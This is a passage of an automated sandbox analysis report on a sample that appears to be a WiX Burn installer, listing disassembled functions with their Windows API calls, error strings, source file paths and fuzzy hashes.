• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                            • String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 199729137-1104870970
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0093E0B5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E6FBB,00000001,?,?,Function_000069E0,?), ref: 0093E0C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                            • String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 1866314245-3391705418
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,008E6DEA,00000000,?,008F0CFC,008E6DEE,008E6DEA,?,008F066B,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000), ref: 0093B711
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0093B718
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008F0CFC,008E6DEE,008E6DEA,?,008F066B,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2,008E7162,008E6DEA), ref: 0093B741
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                            • String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
                                                                                                                                                                                                                                                                            • API String ID: 4275029093-2679686115
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0093C8FF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(RegGetValueW), ref: 0093C915
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • AdvApi32.dll, xrefs: 0093C8C9
                                                                                                                                                                                                                                                                            • Failed to load AdvApi32.dll, xrefs: 0093C8D9
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093C8E5
                                                                                                                                                                                                                                                                            • RegDeleteKeyExW, xrefs: 0093C8F4
                                                                                                                                                                                                                                                                            • RegGetValueW, xrefs: 0093C905
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 856020675-1672349681
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-338742995
                                                                                                                                                                                                                                                                            • Opcode ID: a65dbfe8e726f70aa415f82697b12cedce75038f136c29db1e26eb4d2618aee8
                                                                                                                                                                                                                                                                            • Instruction ID: 3efcc3a5bef47a5629b1a1761478c857b04b353941ee7718f7b9f36ce514de53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a65dbfe8e726f70aa415f82697b12cedce75038f136c29db1e26eb4d2618aee8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94518272D0122DABDB11DEA9CD45FEF7AB8FF49754F110125BA00FB281D77099009BA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 008F7D78
                                                                                                                                                                                                                                                                              • Part of subcall function 00943EAD: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,?,00000000,?,00000000,?,008F7D8F,?,00000080,?,00000000), ref: 00943EC5
                                                                                                                                                                                                                                                                              • Part of subcall function 00943EAD: GetLastError.KERNEL32(?,00000000,?,008F7D8F,?,00000080,?,00000000,?,?,?,swidtag,?,?,?,?), ref: 00943ED2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F7DDF, 008F7E28
                                                                                                                                                                                                                                                                            • Failed to allocate regid folder path., xrefs: 008F7E02
                                                                                                                                                                                                                                                                            • Failed to write tag xml to file: %ls, xrefs: 008F7DB6
                                                                                                                                                                                                                                                                            • Failed to allocate regid file path., xrefs: 008F7DEE
                                                                                                                                                                                                                                                                            • Failed to create regid folder: %ls, xrefs: 008F7DCD
                                                                                                                                                                                                                                                                            • swidtag, xrefs: 008F7D34
                                                                                                                                                                                                                                                                            • Failed to format tag folder path., xrefs: 008F7E16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLast$DirectoryFilelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix4\wix4\src\burn\engine\registration.cpp$swidtag
                                                                                                                                                                                                                                                                            • API String ID: 583680227-1772413233
                                                                                                                                                                                                                                                                            • Opcode ID: db34f762ebd4d2be940f5e8928117365596089c602c3042d50bfe34c7a73c1ce
                                                                                                                                                                                                                                                                            • Instruction ID: a1763d71c99c2e3ea17a31d87c1071c833f433b58ef2cb8fb0e2e95f0867693e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db34f762ebd4d2be940f5e8928117365596089c602c3042d50bfe34c7a73c1ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA41C631E44619BBEB11DAA5CC06FAFBB75FF44B11F108191B600FA290E7B15E509B90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,008E85FC,00000000,?,00000000,?,00000000,?,008FA80F), ref: 008E8B82
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,008E85FC,00000000,?,00000000,?,00000000,?,008FA80F,?,00000001,00000000), ref: 008E8C9E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1256323647
                                                                                                                                                                                                                                                                            • Opcode ID: 9fe77e1f32f587fd0ba2640c2513e5f64492cdd7629dec80f3f038b731722662
                                                                                                                                                                                                                                                                            • Instruction ID: e8d8937f6fb561ae7546174d2d3cc6e61ebfa2009f45ba24d314e7a262874fc3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fe77e1f32f587fd0ba2640c2513e5f64492cdd7629dec80f3f038b731722662
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA31F871A41759FBDF219F96CC46E5E7A68FF06751F100120FB08EA180DBB0EE509BA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D01D
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0090D095
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0090D0AC
                                                                                                                                                                                                                                                                              • Part of subcall function 0090CE40: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0090CD2A,?,00000060), ref: 0090CE7E
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0090D0C3
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D0D1
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0090D0D8
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D0EC
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0090D11C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$LongProc$MessagePost$Quit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3225497149-0
                                                                                                                                                                                                                                                                            • Opcode ID: c6e7329123b2a9345aba0dbd348bd0c9c7b8b06c3b79f448b6a24504e6bef6f6
                                                                                                                                                                                                                                                                            • Instruction ID: e073f96bcb008c88d3ec93768b326abb40e616b84cd4e531a9ef0be633c3140b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6e7329123b2a9345aba0dbd348bd0c9c7b8b06c3b79f448b6a24504e6bef6f6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF318E36119205BFDB259FA9CD48E6B7BBDFF86310F004A28F606921E1C6349911EB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                                                                                                                            • Instruction ID: 0f7861ebd635119ccde668fd735b9399e12fb00007f669c8314f20088cc9d81b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBB169729012759FDB11CF68ECA2BAE7BB9EF55310F244175E848AB386D3749901CBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00947F53,00000000,00000000,00948702,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 009481E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00948381
                                                                                                                                                                                                                                                                            • Failed to get redirect url: %ls, xrefs: 009483AB
                                                                                                                                                                                                                                                                            • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00948221
                                                                                                                                                                                                                                                                            • Failed to get HTTP status code for request to URL: %ls, xrefs: 009483BE
                                                                                                                                                                                                                                                                            • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 009481FF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 009483CD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-2050984236
                                                                                                                                                                                                                                                                            • Opcode ID: 5b2a79dea90e059f22d0639a7d0be522a5bb04c5d56f0793c81acf23219684fc
                                                                                                                                                                                                                                                                            • Instruction ID: 8b97524295a01ac232294e29b866fed6a2bcf759230acdd5218ccc82ec33e2ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b2a79dea90e059f22d0639a7d0be522a5bb04c5d56f0793c81acf23219684fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A514672A40516A7DB254EA8CC0EF6F7A6CEB81F50F144665F910EB2A0EEB5DD009690
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 0094B9D2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094B9DC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2781989572-1833903446
                                                                                                                                                                                                                                                                            • Opcode ID: 7eceee6761d8351b4a7833c5df57310fee82db5c242f3c09582acc0e185388f2
                                                                                                                                                                                                                                                                            • Instruction ID: 085b379f3ad19b4f9a10cae65ca736f27fff2bfc57d17ee6c177d2392e2bdc4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eceee6761d8351b4a7833c5df57310fee82db5c242f3c09582acc0e185388f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE410672B50215BADB249B788C5AF7FB66DFF91708F004919BA01B72C0D774CE0183A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00947F34,00000000,00000000,00000001), ref: 009480F0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00947F34,00000000,00000000,00000001), ref: 00948152
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-283382383
                                                                                                                                                                                                                                                                            • Opcode ID: b17f146f80905af3c8cea178b743173fe484d2fe4de70102d5906e55a7f75cb1
                                                                                                                                                                                                                                                                            • Instruction ID: 8faab78d2e502208eed95d6dcab0aab6d4f351c11ec19d483fd3f6f8cc2e673e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b17f146f80905af3c8cea178b743173fe484d2fe4de70102d5906e55a7f75cb1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62414B73A58325BBEB315A958C49FAF7A6CAF45B94F014125FE04BB191EAB0CC0192F1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0,009031C1,009031C1), ref: 008FD3BF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                            • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix4\wix4\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                                                                                                                                            • API String ID: 3472027048-1762823252
                                                                                                                                                                                                                                                                            • Opcode ID: 8dcd5c990a156ea603edeb1300c7d03ac8518439999a73ce4721efd84a787512
                                                                                                                                                                                                                                                                            • Instruction ID: 82d856d45143ecc73949d3c67ba6af6ec482f7ac5480b29ea489780c941ae852
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dcd5c990a156ea603edeb1300c7d03ac8518439999a73ce4721efd84a787512
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C412E71A4031DBBEB21EA6A8C07F7F265DFB11715F104120BF04FA191D6B49D5097A6
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-1929277467
                                                                                                                                                                                                                                                                            • Opcode ID: ac242df2f5990cfad055d5ec6ca9666f35e5a405fe97ea318f001c84d02c7098
